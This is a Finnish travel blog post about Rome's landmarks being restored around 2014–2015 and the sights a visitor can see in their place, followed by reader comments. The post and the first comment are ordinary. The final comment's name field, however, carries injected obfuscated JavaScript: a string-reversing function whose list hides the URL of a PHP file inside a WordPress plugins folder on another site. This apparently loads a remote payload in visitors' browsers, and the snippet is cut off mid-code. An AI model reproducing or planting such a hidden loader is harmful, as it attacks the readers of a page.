Image Alt

Blog

Rooman ikoniset nähtävyydet paketissa (ja vaihtoehdot, mitä nähdä, kun niitä peruskorjataan)

Jos haaveenasi on aina ollut nähdä Colosseum, Espanjalaisten portaiden yläpäässä oleva Trinità di Monti-kirkko ja Trevin suihkulähde koko komeudessaan, niin kannattaa lykätä Rooman matkaa vielä vuodella. Nämä kaikki ovat nimittäin korjaustöiden vuoksi osittain rakennustelineiden peittämiä. Colosseumin restaurointi- ja puhdistustöistä olenkin jo kertonut aiemmin tässä blogissa. Colosseumin korjaustyöt on toteutettu turistien kannalta mukavasti niin, että vain osa kerrallaan on rakennustelineiden peitossa. Näkyvissä olevan osan eteen ja sisälle voi mennä hyvin ottamaan ne pakolliset lomakuvat. Trinità dei Montin kirkko kaksoiskellotorneineen on kokonaan paketissa, mutta peitteeseen on sentään painettu kirkon kuva niin, että mielikuva portaiden kanssa kokonaisuuden muodostavasta kirkosta säilyy. Sisälle kirkkoon pääsee myös edelleen, vaikka harva turisti itse kirkossa pistäytyy.

Joulukuussa portailla on hyvin tilaa. Rakennustelineiden peitteessä tietenkin korjaustöiden sponsorin mainos.

Sen sijaan Rooman tunnetuin suihkulähde Fontana di Trevi on kesäkuun alusta lähtien turistien harmiksi ja pettymykseksi rakennustelineiden peitossa, vaikka asiasta ei ihan hirveästi huudellakaan (Trevin suihkulähteen omilla nettisivuilla ei esimerkiksi ole mainintaa asiasta).  Toisaalta meren jumala Okeanoksen (Neptunuksen) ja muiden jumalien patsaat näkee nyt lähempää kuin koskaan, sillä suihkulähteen yli on rakennettu silta, jolla pääsee ihan takaseinän viereen kurkkimaan telineiden alle, miten korjaustyöt etenevät. Mutta eihän se tästä näkökulmasta näytä ihan samalta kuin toiminnassa oleva suihkulähde kauempaa katsottuna (jos sitä turistimassojen yli nyt pääsi näkemään). Eikä sitä Roomaan paluun takaavaa kolikkoakaan voi nyt heittää (mikä tulonmenetys Rooman kaupungille!). Trevin suihkulähteen peruskorjaus- ja puhdistustöiden on arvioitu kestävän 20 kuukautta, joten entistä ehompaa lähdettä voi tulla katsomaan vuonna 2016.

Miten näitä rakennustelineiden takaa kurkistelevien patsaiden ilmeitä nyt tulkitsisi?

Hyvä puoli näiden nähtävyyksien peruskorjauksessa on – sen lisäksi tietenkin, että ne tulevat kuntoon – että niiden asemesta voi nyt hyvällä omallatunnolla käydä katsomassa jotain muuta upeaa nähtävyyttä, joita Roomassa riittää. Tässä muutama oma ehdotukseni paketissa olevien nähtävyyksien sijaisiksi:

Colosseumia voi ihailla niin ulkoa kuin sisältä päinkin hyvin rakennustelineistä huolimatta, eikä sen kolossaadiulle löydy oikein vertaa. Paitsi ehkä Domus Aurea, Neron kultainen talo. Tämän järjettömän kokoisen yksityispalatsin säilyneitä jäänteitä ei ole vuosiin päässyt ihailemaan, mutta pari viikkoa sitten se avattiin turisteille toistaiseksi maaliskuun loppuun. Domus Aureaan pääsee vain viikonloppuisin ja opastetuilla kierroksilla. Kierrokset ovat olleet jota kuinkin loppuunmyytyjä, joten paikka on ehdottomasti varattava etukäteen täältä. Olen varannut itselleni kierroksen tammikuussa, joten luvassa on juttua siitä, miltä siellä nyt näyttää.
Suosittelen Rooman antiikin historian ystäville myös Ostia Anticaa, joka kuuluu ehdottomasti maailman aliarvostetuimpiin kohteisiin: vaikka upeiden, hyvin säilyneiden, jopa Pompeijin veroisten raunioiden viereen pääsee kätevästi 20 minuutissa junalla Piramiden asemalta paikallisliikennemaksulla (1,50 €), niin paikalla ei ole koskaan tungosta. Ostiasta löytyy myös amfiteatteri, jonka penkeillä voi istuskella (toisin kuin Colosseumissa) ja vaikka kokeilla, kuinka ääni areenalta kantautuu ylös asti.

Kuva Wikipedia.

Kuten olen aiemminkin maininnut, Espanjalaisten portaiden vetovoimaa en ole koskaan ymmärtänyt. Niitä voi nykyään pitää vain eri puolilta maailmaa tulevien turistien kohtaamispaikkana, minkä huomaa myös jatkuvasti selfie-keppejä ja muuta turistikrääsää tarjoavien kaupustelijoiden virtana. Suosittelen siis ylipäätään menemään Roomassa ihan minne tahansa muualle kuin espanjalaisille portaille. Jos on erityisen viehtynyt portaisiin, niin voi mennä vaikka Piazza Venezialla sijaitsevan Monumento Nazionale a Vittorio Emanuele II:n (joka myös kermakakkuna ja Rooman tekohampaana tunnetaan) viereisille portaille. Niiden yläpäässä olevalla aukiolla on Rooman tunnusmerkiksi muodostunut Romulusta ja Remusta imettävää sutta esittävä patsas. Tai oikeastaan sen jäljennös, sillä alkuperäinen on sisällä Musei Capitoli -museossa. Alkuperäinen susipatsas on muuten etruskien ajoilta: nisiä imevät lapset on lisätty siihen myöhemmin.  Mutta varoitan: tulette hämmästymään patsaan pienuutta, sillä se on Brysselin Manneken Pis- ja Kööpenhaminan Pieni merenneito -patsaiden tapaan paljon, paljon pienempi kuin olisi voinut kuvitellakaan.  Jos taas tavoitteena on tarkkailla paikallisia ihmisiä, kannattaa espanjalaisten portaiden asemesta hankkiutua jollekin piazzalle kuten Trasteveren Piazza di Santa Maria in Trasteverelle tai Piazza Cosimatolle tai Montin Piazza della Madonna dei Montille.

Alkuperäinen susipatsas

Trevin suihkulähteen asemesta voi samalla antaumuksella ihastella jotakin muuta Rooman monista suihkulähteistä. Oma suosikkini on pienehkö Fontana delle Tartarughe, kilpikonnien suihkulähde, Piazza Matteilla Rooman ghetossa. Sen söpöt, joskus itse Berninin nimiin laitetut kilpikonnat lisättiin suihkulähteeseen myöhemmin. Aivan kuten susi-patsaaseenkin (missä on kunnioitus toisen työtä kohtaan?). Berninistä puheen ollen, niin tietenkin Piazza Navonan Fontana dei Quattro Fiumi  on mahtava, mutta se kuten muutkin Navonan suihkulähteet nyt kuuluvat muutenkin Rooman kävijöiden must-kohteisiin.

Fontana delle Tartarughe

Ei huolta, siis kyllä Roomassa nähtävää riittää, vaikka pari nähtävyyttä peitettäisiinkin.

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Heli
9 years ago

No, Roomahan on ikuinen kaupunki, joten kyllä tänne ehtii myöhemminkin 🙂 Kaikkialta maailmasta vielä tulee yleensä lentoja ja järjestetään matkoja tänne. Minäkin kävin Roomassa ensimmäisen kerran vasta kun muutimme tänne, vaikka asuin aiemmin nelisen vuotta Pohjois-Italiassa…Matkusteltiin silloin paljon, mutta käytiin sellaisissa paikoissa, joihin ei Suomesta niin helposti tule lähdettyä. Italiassa on niin paljon hienoja alueita, vaikka Roomakin vie helposti sydämen.

lena / london <script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'
lena / london